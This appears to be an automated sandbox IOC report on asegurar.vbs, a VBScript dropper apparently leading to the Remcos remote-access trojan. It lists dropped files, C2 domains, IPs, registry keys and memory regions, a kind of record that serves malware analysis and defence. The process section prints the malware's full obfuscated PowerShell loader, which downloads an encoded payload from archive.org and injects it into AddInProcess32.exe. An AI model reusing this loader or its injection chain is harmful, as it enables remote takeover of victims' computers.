IOC Report
asegurar.vbs

loading gif

Files

File Path
Type
Category
Malicious
asegurar.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12dpj4vy.nse.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxmgl4iw.zmg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcpwvc25.2ev.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ua33vol0.qv3.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
23spt.duckdns.org
malicious
https://paste.ee/d/tbzjY/0
188.114.97.3
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
https://ia600100.us.arXr
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://analytics.paste.ee
unknown
https://paste.ee
unknown
https://aka.ms/pscore6
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gp
unknown
https://www.google.com
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
207.241.227.240
http://geoplugin.net/json.gp/C
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://analytics.paste.ee;
unknown
https://ia600100.us.archive.org
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://oneget.org
unknown
http://ia600100.us.archive.org
unknown
There are 23 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
23spt.duckdns.org
181.236.206.3
malicious
paste.ee
188.114.97.3
malicious
ia600100.us.archive.org
207.241.227.240

IPs

IP
Domain
Country
Malicious
188.114.97.3
paste.ee
European Union
malicious
191.93.114.27
unknown
Colombia
malicious
181.236.206.3
23spt.duckdns.org
Colombia
malicious
207.241.227.240
ia600100.us.archive.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rmc-RZH5WZ
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-RZH5WZ
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-RZH5WZ
time
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
288F000
stack
page read and write
malicious
19CAE02B000
trusted library allocation
page read and write
malicious
19CB5E90000
trusted library section
page read and write
malicious
19CADA81000
trusted library allocation
page read and write
malicious
C28000
heap
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
19CAEAC4000
trusted library allocation
page read and write
malicious
231A01FB000
trusted library allocation
page read and write
20021C32000
heap
page read and write
2319E480000
heap
page readonly
2319E4B0000
heap
page read and write
20022370000
heap
page read and write
20021C27000
heap
page read and write
7FFAAC720000
trusted library allocation
page read and write
200202B0000
heap
page read and write
28B0000
heap
page read and write
64882F7000
stack
page read and write
2002216B000
heap
page read and write
19C9D855000
heap
page read and write
19C9DDFE000
trusted library allocation
page read and write
231B8276000
heap
page read and write
2319FD30000
heap
page execute and read and write
19C9D89F000
heap
page read and write
200220E9000
heap
page read and write
231B8340000
heap
page read and write
2D7F000
stack
page read and write
7FFAAC600000
trusted library allocation
page execute and read and write
19C9D810000
heap
page read and write
7FFB0C721000
unkown
page execute read
7FFAAC5E0000
trusted library allocation
page execute and read and write
20021C7E000
heap
page read and write
20021C0B000
heap
page read and write
20022271000
heap
page read and write
E6E000
stack
page read and write
7FFB06955000
unkown
page readonly
231A01B0000
trusted library allocation
page read and write
20021C17000
heap
page read and write
7FFAAC650000
trusted library allocation
page read and write
200220CD000
heap
page read and write
19C9B82A000
heap
page read and write
7FFAAC680000
trusted library allocation
page read and write
231A062C000
trusted library allocation
page read and write
19C9D374000
heap
page read and write
20021C21000
heap
page read and write
2002231A000
heap
page read and write
EEE000
stack
page read and write
231A0606000
trusted library allocation
page read and write
2002242F000
heap
page read and write
7FFAAC730000
trusted library allocation
page read and write
200202D0000
heap
page read and write
231B8400000
heap
page read and write
20021C15000
heap
page read and write
200220D8000
heap
page read and write
7FFAAC5DA000
trusted library allocation
page read and write
7FFAAC5B0000
trusted library allocation
page read and write
7FFAAC4C0000
trusted library allocation
page read and write
7FFAAC410000
trusted library allocation
page read and write
C10000
heap
page read and write
6F6187E000
stack
page read and write
231B8345000
heap
page read and write
19C9F109000
trusted library allocation
page read and write
2319E290000
heap
page read and write
7FFAAC794000
trusted library allocation
page read and write
231A027B000
trusted library allocation
page read and write
19C9D957000
heap
page execute and read and write
7BC000
stack
page read and write
7FFAAC5D4000
trusted library allocation
page read and write
7FFAAC690000
trusted library allocation
page read and write
2319E1D0000
heap
page read and write
20022315000
heap
page read and write
7FFAAC4C6000
trusted library allocation
page read and write
2319FE10000
heap
page read and write
20021C58000
heap
page read and write
7FFAAC740000
trusted library allocation
page read and write
20021C0A000
heap
page read and write
19C9B9B0000
heap
page read and write
20022316000
heap
page read and write
7FFB0C720000
unkown
page readonly
2002010F000
heap
page read and write
19CB5B5B000
heap
page read and write
231B82C1000
heap
page read and write
6F6127E000
stack
page read and write
19C9E039000
trusted library allocation
page read and write
6F615F7000
stack
page read and write
231B831A000
heap
page read and write
1B275FE000
stack
page read and write
7FFB06952000
unkown
page readonly
7FFAAC770000
trusted library allocation
page read and write
648857F000
stack
page read and write
20020117000
heap
page read and write
231B0161000
trusted library allocation
page read and write
19C9D1F0000
trusted library allocation
page read and write
231B8355000
heap
page read and write
7FFAAC5F2000
trusted library allocation
page read and write
19C9DDF1000
trusted library allocation
page read and write
19C9B81C000
heap
page read and write
19C9F49C000
trusted library allocation
page read and write
64885FE000
stack
page read and write
7FFAAC720000
trusted library allocation
page read and write
20021C04000
heap
page read and write
231B84E0000
heap
page read and write
231A01B3000
trusted library allocation
page read and write
2319E450000
trusted library allocation
page read and write
7FFAAC710000
trusted library allocation
page read and write
64883F9000
stack
page read and write
6F6137E000
stack
page read and write
7FFAAC4D0000
trusted library allocation
page execute and read and write
19C9DE0A000
trusted library allocation
page read and write
200201AF000
heap
page read and write
231B8343000
heap
page read and write
6F6167C000
stack
page read and write
2319E470000
trusted library allocation
page read and write
20022325000
heap
page read and write
231A0161000
trusted library allocation
page read and write
7FFAAC5D1000
trusted library allocation
page read and write
2319E276000
heap
page read and write
2002231B000
heap
page read and write
7FFAAC42D000
trusted library allocation
page execute and read and write
20021C0B000
heap
page read and write
7FFAAC760000
trusted library allocation
page read and write
7FFAAC4F6000
trusted library allocation
page execute and read and write
200200C0000
heap
page read and write
7DF48DDD0000
trusted library allocation
page execute and read and write
1B277FB000
stack
page read and write
2002230B000
heap
page read and write
6488378000
stack
page read and write
1B26FFE000
stack
page read and write
20021C02000
heap
page read and write
7FFAAC660000
trusted library allocation
page read and write
64881FE000
stack
page read and write
19CB5E80000
heap
page read and write
2A3C000
stack
page read and write
648807D000
stack
page read and write
7FFAAC630000
trusted library allocation
page read and write
20021C02000
heap
page read and write
20021C35000
heap
page read and write
19C9DA11000
trusted library allocation
page read and write
231B8840000
heap
page read and write
7FFAAC620000
trusted library allocation
page read and write
7FFAAC700000
trusted library allocation
page read and write
2E7F000
stack
page read and write
200220DD000
heap
page read and write
6F618FB000
stack
page read and write
231A0268000
trusted library allocation
page read and write
7FFAAC6B0000
trusted library allocation
page read and write
19C9B865000
heap
page read and write
200222EE000
heap
page read and write
6F613FF000
stack
page read and write
7FFAAC670000
trusted library allocation
page read and write
19CAEA2B000
trusted library allocation
page read and write
7FFAAC7A3000
trusted library allocation
page read and write
7FFAAC781000
trusted library allocation
page read and write
2890000
heap
page read and write
231A02BA000
trusted library allocation
page read and write
200220A8000
heap
page read and write
7FFAAC420000
trusted library allocation
page read and write
20021C32000
heap
page read and write
7FFAAC413000
trusted library allocation
page execute and read and write
7FFB06931000
unkown
page execute read
231A01CE000
trusted library allocation
page read and write
200220E4000
heap
page read and write
200200E0000
heap
page read and write
19C9F6FA000
trusted library allocation
page read and write
7FFAAC4E0000
trusted library allocation
page execute and read and write
20020118000
heap
page read and write
7FFAAC640000
trusted library allocation
page read and write
19CADCFD000
trusted library allocation
page read and write
19CADD0B000
trusted library allocation
page read and write
231A0274000
trusted library allocation
page read and write
19C9DA91000
trusted library allocation
page read and write
200220B5000
heap
page read and write
231B01D1000
trusted library allocation
page read and write
2319E270000
heap
page read and write
20021C7E000
heap
page read and write
2319FE16000
heap
page read and write
2002019C000
heap
page read and write
20021C70000
heap
page read and write
7FFAAC412000
trusted library allocation
page read and write
20021D20000
heap
page read and write
7FFAAC4D0000
trusted library allocation
page read and write
19C9DE06000
trusted library allocation
page read and write
19C9DA00000
heap
page execute and read and write
7FFAAC6E0000
trusted library allocation
page read and write
20020420000
heap
page read and write
2002208D000
heap
page read and write
20022098000
heap
page read and write
6487F7E000
stack
page read and write
2319E4B5000
heap
page read and write
20021C04000
heap
page read and write
19C9F0FD000
trusted library allocation
page read and write
6F60DFE000
stack
page read and write
7FFB0C736000
unkown
page readonly
200201AF000
heap
page read and write
7FFB0C742000
unkown
page readonly
20022267000
heap
page read and write
7FFAAC650000
trusted library allocation
page read and write
7FFAAC750000
trusted library allocation
page read and write
19C9B81E000
heap
page read and write
2319FDA0000
heap
page read and write
20020425000
heap
page read and write
474000
remote allocation
page execute and read and write
20020110000
heap
page read and write
7FFAAC6C0000
trusted library allocation
page read and write
7FFAAC740000
trusted library allocation
page read and write
2319E327000
heap
page read and write
7FFAAC4CC000
trusted library allocation
page execute and read and write
7FFAAC530000
trusted library allocation
page execute and read and write
231A01C8000
trusted library allocation
page read and write
6F6177E000
stack
page read and write
7FFAAC5D0000
trusted library allocation
page execute and read and write
19C9D83B000
heap
page read and write
B36000
heap
page read and write
20021C53000
heap
page read and write
2002230B000
heap
page read and write
7FFAAC640000
trusted library allocation
page read and write
6F6147F000
stack
page read and write
20021C7C000
heap
page read and write
1B26EFE000
stack
page read and write
19C9F327000
trusted library allocation
page read and write
7FFAAC5F0000
trusted library allocation
page execute and read and write
19C9B9F0000
heap
page read and write
D30000
heap
page read and write
20022371000
heap
page read and write
200201AF000
heap
page read and write
20022342000
heap
page read and write
200220BD000
heap
page read and write
20021C50000
heap
page read and write
7FFB06946000
unkown
page readonly
20021C00000
heap
page read and write
19C9B9E0000
heap
page read and write
7FFAAC610000
trusted library allocation
page execute and read and write
7FFAAC610000
trusted library allocation
page read and write
6F611FE000
stack
page read and write
B20000
heap
page read and write
20021C13000
heap
page read and write
7FFAAC620000
trusted library allocation
page read and write
19C9D820000
heap
page read and write
7FFAAC5C0000
trusted library allocation
page read and write
7FFAAC5E0000
trusted library allocation
page execute and read and write
2B7D000
stack
page read and write
7FFAAC5C1000
trusted library allocation
page read and write
2002209D000
heap
page read and write
19C9D370000
heap
page read and write
19C9DE35000
trusted library allocation
page read and write
20022342000
heap
page read and write
2002010A000
heap
page read and write
231B8336000
heap
page read and write
2002011F000
heap
page read and write
20021C68000
heap
page read and write
2002207C000
heap
page read and write
20022317000
heap
page read and write
278E000
stack
page read and write
20022326000
heap
page read and write
648817E000
stack
page read and write
19C9D84C000
heap
page read and write
648847E000
stack
page read and write
19C9D262000
trusted library allocation
page read and write
AFC000
stack
page read and write
19C9D7D0000
heap
page execute and read and write
20022079000
heap
page read and write
19CB5A30000
heap
page read and write
20022342000
heap
page read and write
478000
remote allocation
page execute and read and write
231A0277000
trusted library allocation
page read and write
7FFAAC6B0000
trusted library allocation
page read and write
19C9B86A000
heap
page read and write
2F7F000
stack
page read and write
20021C35000
heap
page read and write
7FFB0C740000
unkown
page read and write
6487BEE000
stack
page read and write
7FFAAC7A0000
trusted library allocation
page read and write
19C9F131000
trusted library allocation
page read and write
2002242F000
heap
page read and write
19C9DDFB000
trusted library allocation
page read and write
7FFAAC5CA000
trusted library allocation
page read and write
64884FE000
stack
page read and write
19C9EA39000
trusted library allocation
page read and write
2002231E000
heap
page read and write
19CB5B10000
heap
page read and write
6F610FD000
stack
page read and write
2319FD10000
heap
page execute and read and write
19C9B9E4000
heap
page read and write
19C9D6CA000
heap
page read and write
231A017B000
trusted library allocation
page read and write
231B0170000
trusted library allocation
page read and write
231A0697000
trusted library allocation
page read and write
7FFAAC798000
trusted library allocation
page read and write
7FFAAC41D000
trusted library allocation
page execute and read and write
6F61073000
stack
page read and write
19C9D260000
trusted library allocation
page read and write
19C9F0E4000
trusted library allocation
page read and write
7FFAAC6D0000
trusted library allocation
page read and write
231A01B5000
trusted library allocation
page read and write
20021C63000
heap
page read and write
20021C7E000
heap
page read and write
19C9D840000
heap
page read and write
7FFAAC422000
trusted library allocation
page read and write
2002216B000
heap
page read and write
20022071000
heap
page read and write
231B8270000
heap
page read and write
2319E243000
heap
page read and write
20021C2B000
heap
page read and write
200220AD000
heap
page read and write
2319E410000
heap
page read and write
2319E1E0000
heap
page read and write
2319E2F6000
heap
page read and write
200200F2000
heap
page read and write
7FFAAC6F0000
trusted library allocation
page read and write
B30000
heap
page read and write
2C7F000
stack
page read and write
19C9F352000
trusted library allocation
page read and write
19C9B7F3000
heap
page read and write
20021C07000
heap
page read and write
19C9DE31000
trusted library allocation
page read and write
7FFAAC42B000
trusted library allocation
page read and write
20022081000
heap
page read and write
7FFAAC680000
trusted library allocation
page read and write
1B26B2A000
stack
page read and write
2319FD17000
heap
page execute and read and write
20020109000
heap
page read and write
6487EFE000
stack
page read and write
20021C74000
heap
page read and write
19CADA20000
trusted library allocation
page read and write
7FFAAC660000
trusted library allocation
page read and write
200220EB000
heap
page read and write
20022322000
heap
page read and write
7FFAAC6D0000
trusted library allocation
page read and write
2319E2BF000
heap
page read and write
20021C53000
heap
page read and write
2319E27C000
heap
page read and write
19C9D83D000
heap
page read and write
20021C6B000
heap
page read and write
7FFAAC7C0000
trusted library allocation
page read and write
19C9F631000
trusted library allocation
page read and write
6F61579000
stack
page read and write
2319E2B8000
heap
page read and write
6487E73000
stack
page read and write
19C9F10D000
trusted library allocation
page read and write
19C9F0E9000
trusted library allocation
page read and write
19CB5B95000
heap
page read and write
7FFAAC430000
trusted library allocation
page read and write
231B834B000
heap
page read and write
20021C7E000
heap
page read and write
7FFAAC700000
trusted library allocation
page read and write
20022303000
heap
page read and write
2002236D000
heap
page read and write
2002019C000
heap
page read and write
200201AF000
heap
page read and write
2002216B000
heap
page read and write
19CADA11000
trusted library allocation
page read and write
64880FE000
stack
page read and write
231B83E0000
heap
page read and write
231A02C1000
trusted library allocation
page read and write
6F614F7000
stack
page read and write
19C9D210000
trusted library allocation
page read and write
2002216C000
heap
page read and write
7FFAAC7B0000
trusted library allocation
page read and write
19C9B7E9000
heap
page read and write
20022070000
heap
page read and write
20021C48000
heap
page read and write
EAE000
stack
page read and write
20021C37000
heap
page read and write
19C9D1B0000
heap
page read and write
20022267000
heap
page read and write
2002216B000
heap
page read and write
20021C01000
heap
page read and write
7FFAAC730000
trusted library allocation
page read and write
7FFAAC4D6000
trusted library allocation
page read and write
2B3F000
stack
page read and write
7FFAAC602000
trusted library allocation
page read and write
19C9D950000
heap
page execute and read and write
7FFAAC506000
trusted library allocation
page execute and read and write
19C9F0FB000
trusted library allocation
page read and write
19C9D230000
trusted library allocation
page read and write
7FFAAC630000
trusted library allocation
page read and write
7FFAAC540000
trusted library allocation
page execute and read and write
19C9D8EE000
heap
page read and write
20022323000
heap
page read and write
20021C35000
heap
page read and write
2319E200000
heap
page read and write
2319FDB0000
heap
page execute and read and write
6F616FE000
stack
page read and write
648904E000
stack
page read and write
20022318000
heap
page read and write
7FFAAC414000
trusted library allocation
page read and write
20021C53000
heap
page read and write
648867B000
stack
page read and write
200220B8000
heap
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
19C9DC32000
trusted library allocation
page read and write
231B835E000
heap
page read and write
7FFAAC670000
trusted library allocation
page read and write
2319E490000
trusted library allocation
page read and write
20022270000
heap
page read and write
7FFAAC424000
trusted library allocation
page read and write
200220C8000
heap
page read and write
19C9D893000
heap
page read and write
6F6117E000
stack
page read and write
19C9D2A0000
trusted library allocation
page read and write
19C9D376000
heap
page read and write
2319E278000
heap
page read and write
2002216B000
heap
page read and write
20021C77000
heap
page read and write
7FFAAC690000
trusted library allocation
page read and write
19C9B7C0000
heap
page read and write
2002236E000
heap
page read and write
19C9E011000
trusted library allocation
page read and write
2002216B000
heap
page read and write
7FFB06950000
unkown
page read and write
7FFB0C745000
unkown
page readonly
200201B7000
heap
page read and write
19CB5B71000
heap
page read and write
19C9F3AD000
trusted library allocation
page read and write
7FFAAC4DC000
trusted library allocation
page execute and read and write
6F612FD000
stack
page read and write
2319E230000
heap
page read and write
6488279000
stack
page read and write
200220B8000
heap
page read and write
7FFAAC6F0000
trusted library allocation
page read and write
231A0760000
trusted library allocation
page read and write
C20000
heap
page read and write
1B274FE000
stack
page read and write
231B82BF000
heap
page read and write
7FFAAC6E0000
trusted library allocation
page read and write
19C9F6F6000
trusted library allocation
page read and write
7FFAAC6C0000
trusted library allocation
page read and write
7FFAAC43C000
trusted library allocation
page read and write
7FFB06950000
unkown
page read and write
19C9B820000
heap
page read and write
7FFAAC423000
trusted library allocation
page execute and read and write
20021C43000
heap
page read and write
64890CD000
stack
page read and write
1B276FE000
stack
page read and write
231A075E000
trusted library allocation
page read and write
19C9DE0E000
trusted library allocation
page read and write
6487FFF000
stack
page read and write
1B272FE000
stack
page read and write
20021C05000
heap
page read and write
1B271FF000
stack
page read and write
19C9D220000
heap
page readonly
D40000
heap
page read and write
28FC000
stack
page read and write
19C9B7E0000
heap
page read and write
7FFAAC710000
trusted library allocation
page read and write
20022323000
heap
page read and write
7FFB06930000
unkown
page readonly
19C9B826000
heap
page read and write
29FF000
stack
page read and write
19C9D8B5000
heap
page read and write
231A0183000
trusted library allocation
page read and write
7FFAAC5C2000
trusted library allocation
page read and write
19C9B83E000
heap
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
There are 443 hidden memdumps, click here to show them.